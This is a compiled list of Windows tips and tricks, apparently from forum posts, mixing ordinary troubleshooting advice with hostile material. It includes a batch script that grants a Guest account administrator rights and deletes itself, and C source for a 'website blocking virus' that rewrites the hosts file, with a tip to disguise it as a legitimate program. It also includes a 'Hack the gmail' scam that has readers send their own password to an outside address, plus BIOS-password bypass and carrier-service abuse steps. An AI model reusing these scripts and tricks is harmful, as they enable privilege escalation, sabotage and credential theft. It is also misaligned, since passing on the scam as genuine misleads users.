Computer Tips

1. Eliminate the "basics": I don't know why, but as soon as the "non-savvy" folks have a problem with their computer, they always assume the worst case scenario while overlooking some basics. By basics, I mean, if you play a cd and can't hear any sound, before you start thinking there's something wrong with your cd drive, please try checking your speaker connections, make sure you don't have your compuer set on 'mute' (which can usually be discovered in Control Panel/Sound Settings) and, if you have powered speakers, make sure they are plugged in.

2. Right-click is your friend: well, for PC computers anyway, if you are able to get to your log-on screen, see your desktop and select files, right-clicking on them can yield at least some useful information---in fact, even if it doesn't display that much information, that itself can be informative, as that might indicate file corruption.

3. The good and bad of "Safe Mode": even though Safe Mode is good for analysis purposes, one important drawback of it is that when in Safe Mode, certain hardware drivers will not load...particular your optical (cd/dvd) drives, so don't be worried if you can't play a movie or install from a disk in Safe Mode; you're effectively not supposed to be able to until you can boot in regular mode.

4. Disk Defragment is your friend, too: since we download byte by byte, files are written to our computer in "discontiguous" fashion, meaning, instead of data written to our hardrives in linear, straightforward order, our computers sometimes (and especially for downloads) write "around" here and there; it's just like when we've probably all gotten as a gift that pretty, shiny little organizer where we can keep all phone numbers and addresses but most of us jot info down on the back of receipts, tickets, slips of paper and what not. Why? Because we're using what's handy at the moment; the computer kinda does the same thing with data sometimes. Disk Defragment (found in Programs/Accessories/System Tools/Disk Defragment) is the computer's way of compacting/organizing it's 'scattered' files so that it can run and access data more efficiently...just like we ought to take those loose slips of info and collect them all to that shiny, pretty organizer. Some might suggest defragging every couple of weeks or maybe setting your computer to do so "automatically" at scheduled times. Others might suggest retail alternatives to Windows own defrag utility. In my case, it turns out that my most discontiguous files are indeed the ones I download; after archiving them to a cd/dvd and erasing them from my hardrive, my hardrive volume is in okay shape...but I guess I defrag once every few gigs downloaded.

5. Get to know your keyboard shortcuts: I've learned a certain "unwritten code" of computer professionals that has to do with efficiency and grace. The meat of the code is that, "the more professional a computer user is, the less he/she uses the mouse" . That may not be totally true, but knowing the keyboard shortcuts is a time-saver and makes learning new software applications that much easier. For typing short emails and letters, it might not make a difference, but for graphic, game and web designers, video work, animation, music, time can be money...and a penny saved is a penny earned. For pc users, the core 7 keyboard shortcuts are Ctrl+Z (undo), Ctrl+X (cut), Ctrl+C (copy), Ctrl+V (paste), Ctrl+S (Save), Ctrl+P (Print) and Ctrl+A (Select All); in some applications, these keyboard combos may have different, specialized functions, but are consistent for general usage...and they apply to data, not just text, so audio and video files can be shifted around too.

This of course applys to applications and their often-times specialized keyboard shortcuts too; I'd suggest you learn at least some of them for any software program you use on a regular basis (if applicable), even as some keyboard shortcuts are (for whatever reason) hidden (like, with some video files, you can hit "Ctrl+I" ["I" for "image"] in Windows Media Player and capture a still of the video; I defy anyone to find that little bit of knowledge in all of WMP's help files--it just isn't there!).

5. Save often: Self-Explanatory (I needed one easy to write tip in here!!)

6. (the most controversial one) IT'S NOT A VIRUS!: Probably none of my 'tips' are gonna receive ire as much as this one, but sometimes a person just has to stick their neck out and separate from the herd and here's one such moment for me. In my few short years of troubleshooting computers, I've seen dozens of machines and nearly every time a worried family member, friend, co-worker, friend-of-a-friend with the problematic pc (a few macs too, but mostly pc) suggested "I think it's a virus" and every single time...it wasn't. The closest equivalent most people I've attempted to help (there was two failures in all; those two eventually got new computers) have had to a virus is poorly-written adware that ended up causing booting/OS loading problems, but that was the extent of it. Maybe I should've labeled this tip "Chill Out, dude", as there's really not much advice in it--except, before plunking down dollars per hour to have someone look at it in a store, please consult your local 'geek' to have a crack at it; us geeks like being able to solve problems and would likely do it for free or hundreds less than the store would plus do a better, faster job (as the store may have HUNDREDS of machines to deal with, while we can dedicate ourselves to your machine alone).

7. Spring some dough for a cheap, backup computer: even cheaper than the stores or the (less altruistic) gurus, the internet is an online university where there's likely at least some useful info for a computer problem. Sometimes, if you just had a second computer to log on and snoop around with, you could find a fairly simple answer to an issue. Consider the purchase of a $50 used computer an investment against paying over $100 per hour (two-hour minimum at most places just to look at a machine and call you back in two weeks to tell you, "the computer has a problem") for compuer 'repair'...I should address that more as another tip.

8. "Stand-By Mode" just might also be your (computer's) friend: Please imagine being on a bike. Now imagine you're at the foot of a hill. Finally, imagine that you start peddling right at the foot of the hill. Most of us know that it's better to get a nice, 'running' start on a bike before having to peddle straight up hill.

But every time we power on our computers, we're doing the same thing to them. Over time, this can cause minor to serious wear and tear on our machines, resulting in problems.

Me? I've probably had my machine turned off about 6 times (for a total of like 25 hours) this year; otherwise, when not using it, I had it in "Standby Mode". That way, when I'm ready to use it again, the computer has a 'running' start; despite what you may think, it hasn't really hit me hard on my electric bill. I'm used to paying less than $20 a month for electricity and I've paid less than $20 a month for electricity before and since I had a computer and before and since I started standby mode. Knock on wood ("knock knock"), 4 years and I've never had to take 'my baby' to the shop (I mean, it's had problems, but I've gotten through them myself). I honestly attribute that (largely) to keeping my computer in standby mode. The average computer uses about 250-300 watts of electricity at full mast; that's about 3 light bulbs burning--I can't imagine that's even $4 a month extra on the bill (which is a small investment to help keep the computer in it's best performance shape).

9. Only reboot your computer with the power button as a last result: the proverb for aging is "the eyes are the first to go". There's a tendacy in computers, especially after numerous times a user has rebooted the comptuter with the power button, for the boot/OS initialization files to "go" first too, which can be a real headache to resolve. For XP users, we have the benefit of "Task Manager", which can be called up by pressing [/b]Ctrl+Shift+ESC[/b] to turn off an individual process/application that might hang up a computer; older Windows OS's can use Ctrl+Alt+Del and (hopefully) cut off a non-responsive program there.

Otherwise, if your boot routine gets corrupted and you can't even boot in safe mode, you're stuck dealing with (in Windows) DOS, which fewer and fewer people these days know how to work with, and the ones who DO know charge a stiff fee to troubleshoot in. At that point, most people have to look forward to a loss of data (like, if you have to reformat the hardrive and reinstall the OS) plus paying for some new equipment to resolve...especially if they don't have a back-up computer (tip #7) to research DOS or (usually and additional purchase) don't have any books on the subject.

10. My "get out of jail free" card : at this point, I just want to welcome/ask/encourage some of the gurus (like the mods) who are part of this site to please amend/correct and/or add to this list. Although these "tips" seemed important to me, I'm sure there are possibly more primal things I've overlooked...possibly because I don't know them either, or certain basics might have seemed too obvious even to me to mention.

hide ur folders without the usage of folder lock

suppose u want to hide a folder named jay  which is in D: of ur computer

go to command prompt
start--->run--->cmd-->d:

after changing it from C: to D:

type D:/>attrib +h +s jay
the above command is to hide the folder

to show the folder

tyoe D:/>attrib -h -s jay

in this type of hidding the folder cannot be viewed even if we make advance search or even changing the folders menu to (show all hidden files)

Be careful while using Ctrl+C

We do copy various data by ctrl+c for pasting elsewhere. This copied
data is stored in clipboard and is accessible from the net by a
combination of Javascripts and ASP.

Just try this:
1) Copy any text by ctrl+c
2) Click the Link:

http://www.sourcecodesworld.com/special/clipboard.asp

3) You will see the text you copied on the Screen which was
accessed by this web page.

Do not keep sensitive data (like passwords, creditcard numbers, PIN
etc.) in the clipboard while surfing the web. It is extremely easy to
extract the text stored in the clipboard to steal your sensitive
information.

I hope you understand the risk now.

FREE Airtel GPRS

You need a PC or a Laptop and the required connectivity tools ,ie.,
Serial/USB cable OR Infrared Device OR Bluetooth dongle

1) Activate Airtel Live! ( It's FREE so no probs)

2) Create TWO Airtel gprs data accounts (yep TWO) and select the
FIRST as the active profile.

3) Connect your mobile to the PC (or Laptop) and install the driver for
your mobile's modem.

4) Create a new dial-up connection using the NEW CONNECTION
WIZARD as follows

Connecting Device : Your mobile's modem
ISP Name : Airtel (or anything you like)
Phone Number : *99***2#
Username and Password : blank

5) Configure your browser and download manager to use the proxy
100.1.200.99 and port 8080.( My advice is to use Opera since you
can browse both wap and regular websites)

6) Connect to the dial-up account. You will be connected at 115.2
kbps (but remember, that is a bad joke).

7) Pick up your mobile and try to access any site. You will get "Access
Denied..."(except for Airtel Live!). IT DOES NOT MATTER.
Keep the mobile down.

8 ) On the PC ( or Laptop) open your browser, enter any address ,
press ENTER and.......WAIT

9) After a few seconds the page will start to load and you have the
WHOLE internet at your disposal. The download speeds are decent.

Types of Viruses

File Infector Viruses

       The most "Traditional" form of a computer virus is a file infector virus. It injects itself and hides within the code of another program. The program it injects itself into can be anything - as long as it's executable (Some common file extension examples are: EXE, COM, SYS, BAT and PIF). When the infected program is launched, the virus code copies itself to your computer's memory, typically before the original program code is launched. By loading itself onto your system's memory, the virus can continue to run even after the host program is shut down. Before the internet, file infector viruses accounted for an estimated 85% of all virus infections. That number is, however, down, because of the many ways to spread viruses through the internet now-a-days.

Boot Sector Viruses

            Boot sector viruses live in the part of the disk that is read into memory and executed when your computer boots up. Once loaded, the virus has potential to infect any other disk, be it a CD, floppy disk, SD card or anything of the sort. A disk-based boot sector virus can also infect a PC's hard disk. Most boot sector viruses were spread through the use of floppy disks, mostly in the days when hard disk's were less common. Since removable disks are far less used today, especially to boot up, the risk of being infected by a boot sector virus is low.

Macro Viruses

        Some viruses are created with the macro capabilities of some software. Macros are small programs designed to do very specific tasks within an application. The most common macro language, used in all Microsoft applications is VBA (Visual Basic for Applications). VBA code can be added to a word document to create customs menus and perform automatic operations; unfortunatley VBA code can also be used to modify files and send unwanted e-mail messages automatically. What makes macro viruses particularily dangerous is that macros - and thus macro viruses - can be attached to word documents. Most virus types, especially the older ones, had to be imbedded in executable files, which made them relatively easy to find, delete and stop. But when a document file can be infected, and most users open documents without any second thoughts, its far easier to become infected. Hence, most users who are usually super-vigilant about downloading files often open documents, like said above, with no second thoughts. Because data and word files are shared so freely, especially in corporate networks, it is very easy for macro viruses to spread.

Script Viruses

         Script viruses are based on common scripting languages typically used on webpages and in some programs. These viruses are written in JavaScript, ActiveX and Java applets, which commonly run automatically when you visit the webpage. With the increasing use of people browsing the web, these script viruses are becoming far more common, and more deadly. The good news is, however, that if you have real-time web scanning enabled, and the warning bar shows up, you have a fairly low chance of being infected.

Trojan Horses

           A trojan horse is a program that claims to do one thing but does something totally different. A typical trojan horse has a filename that makes you think it's innocent enough, and safe to open. But when you open this file, its actually a virus program that proceeds to inflict damage to your system. It delivers it's payload through deception, and the name is based on the Trojan Horse in the work of fiction. Trojan horses are becoming more common, mostly through email. Some trojan horses might even claim to be anti-virus applications but turn out to be deadly, system-wrecking applications.

Worms

              A worm is a particularily nasty type of virus that scans the internet or a computer or possibly even a specified network that has a specific security hole. It then copies itself to the new machine through the security hole and then starts replicating itself there and scanning for new targets off the new system. Worms replicate VERY quickly, a network with one computer infected with a worm can be brought to it's knees in a matter of hours. Worms don't nessicarily have to be delivered through conventional file-sharing activities; so called "file-less worms" are recent additions to the virus lists. While operating, these worms exist only in system memory, making it VERY difficult to catch, identify and remove them. These worms could cause large amounts of damage in the near future

Remove shut down option

Wanna play with your friends by removing the shutdown option from start menu in their computer.
Click on start>run(win key+r)
Then tpye “regedit” there, this opens up the registry editor, now goto
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>Explorer
Then set “NoClose”=”DWORD:1

Automatically close non-responsive programs

With a small registry tweak, Windows XP can be set to automatically close any program that 'stops responding' (crashes), eliminating the need for you to use the task manager to close down the offending software manually.
To do this:
Open REGEDIT and navigate to HKEY_CURRENT_USER\Control Panel\ Desktop
Modify the REG_SZ entry AutoEndTasks with a value of 1

Set Wallpapers in Drives

All you have to do is just create a "Notepad" file and copy paste this in your Drive
[{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea_image=C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\sunset.jpg iconarea_text=0x00FFFFFF
Save it as desktop.ini

Make your start menu run faster

1. Go to to 'run' Type regedit.

2. Browse to HKEY_CURRENT_USER > CONTROL PANEL > DESKTOP

3. There is an key called 'MenuShowDelay'

4. Double click on it and change 400 to 0

5. Click 'ok' and restart your computer to see changes to take effect

Hide your files in jpeg format

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).

2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).

3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.

4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.

5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both.

6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .

Its working accurately, i itself tested.

Hack admin from Guest

HaCk "GUEST" with Admin privileges
Copy this to notepad

Quote:
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.

Install Programs in LIMITED without ADMINISTRATOR Privileges

           This might not always work but it's pretty useful because your able to install programs although your administrator has bloked it.

Steps

1. When your installing the program here is what you have to do.
2. When it gives you the option of choosing the directory or destination where the program will be intall, before clicking next click browse to choose a different destination.
3. The destination your going to choose is
C:\Documents and Settings\"your username"\"name of program being installed"\
4. So just browse to
The C:\ drive
Then Documents and Settings
Then your User Name
5. The reason why you do this is because since your intalling it in your account name the computer doesn't stop or check anything because its your account and your name, but if you just select the desktop and choose to install it there it going to say something like "you do not have enough administrative privileges" something like that.

Lock any folder without using any software

1. Suppose you have a folder named abcd in D:\abcd.

2. In the same drive next to the folder create a new notepad file with the exact statement

ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D}

3. Now save this text file as loc.bat

4. Create another notepad file and type

ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D} abcd

5. Save this as key.bat

6. Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed .

7. To open the folder double click key.bat and you get back your original folder.

8. For more safety keep the key.bat in another location . Only for unlocking copy paste to the original location and double click. (don't forget to replace abcd with the folder name)

OR

Paste it in notepad

Quote:
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Save it as batch file(with extension .bat).Any name will do.
Now you see a batch file.
Double click it to create a folder locker.
A new folder named Locker would be formed at the same location.
Now brings all the files you want to hide in the locker folder.
Now double click the batch file to lock the folder namely Locker.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.

Windows Will crash in 49.7 Days when it runs continously

Will Windows work continuously for more than 49.7 days?

Here is a information, which may surprise you all. Windows crashes automatically if you don't switch off the machine for 49.7 Days. Microsoft accepts this. Do you know why?

In Windows the Virtual Machine Manager (here after referred as VMM) is responsible for creation, execution, monitoring and termination of virtual machines. This VMM, which is a 32 bit, protected mode operating system entity, provides a number of system services at chip level. One of these services is "Get_System_Time". This particular service loads the EAX register with the time in milliseconds since Windows started on that machine. This service is accurate to 1 ms. EAX is a 32 bit register in Intel 386 Processor onwards.

So the maximum number of milliseconds it can hold is
(2^32)-1 = 4294967295 milliseconds = 4294967.295 seconds = 71582.79 minutes = 1193 hours = 49.7 days.

So after 49.7 days the EAX resets to zero. Most of the Drivers use this Time Service to keep track of the Timeout of various services they provide. So after 49.7 days the drivers cannot use the Get_System_Time function of VMM and they crash taking the OS along with.

Trojans and Spyware

What is a Trojan Horse?
This term "Trojan Horse" comes from a Greek fable, in which the Greeks presented a giant wooden horse to the Trojans as a peace offering. However, a nasty surprise awaited the Trojans as Greek soldiers sprung out of the hollow horse and captured Troy. Similarly, a Trojan horse program presents itself as a useful computer program, while it actually causes havoc and damage to your computer.

Increasingly, Trojans are the first stage of an attack and their primary purpose is to stay hidden while downloading and installing a stronger threat such as a bot. Unlike viruses and worms, Trojan horses cannot spread by themselves. They are often delivered to a victim through an email message where it masquerades as an image or joke, or by a malicious website, which installs the Trojan horse on a computer through vulnerabilities in web browser software such as Microsoft Internet Explorer.

After it is installed, the Trojan horse lurks silently on the infected machine, invisibly carrying out its misdeeds, such as downloading spyware, while the victim continues on with their normal activities.

What is Spyware?
Spyware is a general term used for programs that covertly monitor your activity on your computer, gathering personal information, such as usernames, passwords, account numbers, files, and even driver’s license or social security numbers. Some spyware focuses on monitoring a person’s Internet behavior; this type of spyware often tracks the places you visit and things you do on the web, the emails you write and receive, as well as your Instant Messaging (IM) conversations. After gathering this information, the spyware then transmits that information to another computer, usually for advertising purposes.

Spyware is similar to a Trojan horse in that users unknowingly install the product when they install something else. However, while this software is almost always unwelcome, it can be used in some instances for monitoring in conjunction with an investigation and in accordance with organizational policy.

Spyware is installed in many ways:

    * Most often spyware is installed unknowingly with some other software that you intentionally install. For example, if you install a "free" music or file sharing service or download a screensaver, it may also install spyware. Some Web pages will attempt to install spyware when you visit their page.
    * A person who wants to monitor your online activities may also manually install spyware. Depending on how this is done, this might be acceptable surveillance of an individual or an unwelcome, even illegal, invasion of privacy.

Trojans, Spyware & Crime
Trojans and spyware are crimeware—two of the essential tools a cybercriminal might use to obtain unauthorized access and steal information from a victim as part of an attack. The creation and distribution of these programs is on the rise—they are now 37% of all of the thousands of malware Symantec processes on a weekly basis.

Trojans and spyware are developed by professionals. Trojans and spyware are often created by professional crimeware authors who sell their software on the black market for use in online fraud and other illegal activities.

How Can I Avoid Getting Infected
Symantec has performed in-depth research on how and when crimeware programs are created in order to gain a deeper understanding of the problem. Our analysis reveals that Trojans and spyware are developed as a full-time job during what might be considered a normal workday. These findings suggest that crimeware authors are creating their Trojans as a full-time profession.

Block Websites permanently through Programs

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1?;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

Shutdown your PC without using any external program

Auto Shutdown Pc without using any external program.......

METHOD # 1

Do you know that you can make your PC shutdown at a time u wish to?
Here is the trick!!
How To Make A Shutdown Timer!

Step 1:

Right click on your desktop and choose "New=>shortcuts".

Step 2:

In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:

Make up a name for the shortcut and you're done.
You can change the icon by right clicking=>properities=>change icon=>browse.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.

METHOD # 2

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run

Type Code: at 11:35 shutdown -s

to abort

Code:

shutdown -a

take note: all time are in 24hr, example u would like to shutdown at 8:30pm, you should type

"at 20:30 shutdown -s" without quote

METHOD # 3

you can use a batch for that as well it makes it easier to use
just run the batch and enter the time you want it to shutdown

shutdown.bat
Type Code:
@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit

also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown Pc"

using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting Pc

How to Find Email Accounts Accessed on a Computer

1.Open your email client and click the "Tools" button at the top of the window. Scroll down through the drop-down menu and select "Accounts."

2.Look through the list of accounts in the new window. Read the "incoming server" heading to find out which service they route their email through, such as "Bresnan" or "Comcast."

3.Check the "User Name" heading to find the exact email address being accessed through your email client. Close the email client and return to your web browser.

4.Click the "History" button and select "View All History." Click the "Name" tab to organize the list of websites alphabetically.

5.Scroll through the list of websites to find web-based email accounts such as "Gmail" or "Yahoo." Click on one of the websites to be taken to the email provider's website.

6.Check the text directly underneath the "user name" and "password" fields. Look for a heading that says something similar to "Your session has expired" or "You are no longer logged in." Check to see if the text notification lists the email user name.

7.Return to the "History" page and look for websites for major Internet service providers (ISP), as many ISPs give the option to log into an email account remotely from their website.

Hack the gmail

Hack the gmail
Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type " PASSWORD RECOVERY "
Step 4: Send this to - sysadmin.hacking@gmail.com
Step 5: Write this in message box.
(first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
(fourth line) - <pwdcursive><v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#"
start?></script>=""></cursive><>
{simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
Usually only system administrators should be able to use this, but when you
try it with your own password and mail this message from your Gmail account
the computer gets confused! Why your password is needed- automatic Gmail
responder will require your "system administrator password" which is in fact
your own password!!! But the : computer doesn't know.

THE PASSWORD WILL AUTOMATICALLY BE SENT TO YOUR GMAIL! INBOX IN A MAIL
CALLED "SYSTEM REG MESSAGE" FROM "SYSTEM". This is an awesome trick and
works as many times as you try it. Have fun! NOTE: Use account you have been
using for few days say at least 30 days. Otherwise Gmail may take new
account as temporary and this trick may not work. Moreover use it soon
otherwise this flaw can be rectified soon.
Please be advised that it usually works with Gmail & AOL but i'm not to sure
about HOTMAIL but can try. THE ONLY WAY YOU CAN HACK SOMEONE'S AOL ACCOUNT
IS PROVIDING YOU HAVE AN AOL ACCOUNT.
ALTHOUGH THIS IS GMAIL ACCOUNT INFORMATION CENTER, IT HAS BEEN ABLE TO WORK
WITH AOL.
I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS INFORMATION NOR
WILL I BE HELD ACCOUNTABLE, THIS INFORMATION I'M SHARING IS FOR EDUCATIONAL
PURPOSES ONLY. PLEASE USE IT TO YOUR DISCRETION.............
HAPPY HACKING ......

Reset the BIOS password

1.Unplug the computer from the outlet. If you don't you could electrocute yourself or destroy the computer as you reset the BIOS password.

2.Wait 5-10 minutes for the capacitors in the computer to lose its charge.

3.Now open the side of the computer exposing the motherboard. Now, look for the battery on the motherboard. Most batteries will look like a watch or hearing aid battery. Some will look more like a AAA batteries wrapped in plastic though.

4.Once you find the battery look at how it is held on the mother board. Most have a small clip that holds the battery in place. By removing the battery the motherboard loses its ability to hold memory, and rests the BIOS password. If the motherboard battery with a clip that sits on the battery check for a small clip on the side of the battery to slide it out.

5.Using a small screwdriver to slide back any clips and take out the battery.

6.Wait 5 minutes to reset the BIOS password.

7.Replace the battery, put the cover back on and restart the computer. Now the computer should have a cleared BIOS password.

Break the BIOS password

1.Unplug the computer. Remove the monitor and other peripherals from the computer.Open the computer's cover.

2.Look for a jumper labeled "PWD" or something similar, near the CMOS battery on the motherboard. If you can't find it, consult the manual for your motherboard to find out where this jumper is located. Remove the jumper, which is a little plastic sheath covering some of the pins. This disables the password.

3.Remove the CMOS battery. The CMOS battery is a round battery that looks like a watch battery. Release the battery, keep it out of the computer for a few seconds, then put it back. The removal of the battery resets the BIOS and clear the password.

4.Use a backdoor password or a keyboard command. Most BIOS manufacturers have standard passwords that can be used to bypass the BIOS password. Search the Internet to find a list of passwords. You need to know what your BIOS is. Hold the left shift key down during the boot process to bypass the BIOS password on most Toshiba systems.

5.Browse the web for third party password hacking tools, if none of the other methods works.

6.Take the hard drive out of the computer. Once the hard drive is out of the password protected computer, you can access the information on it. Place the drive as a secondary drive in another computer to copy information from it.
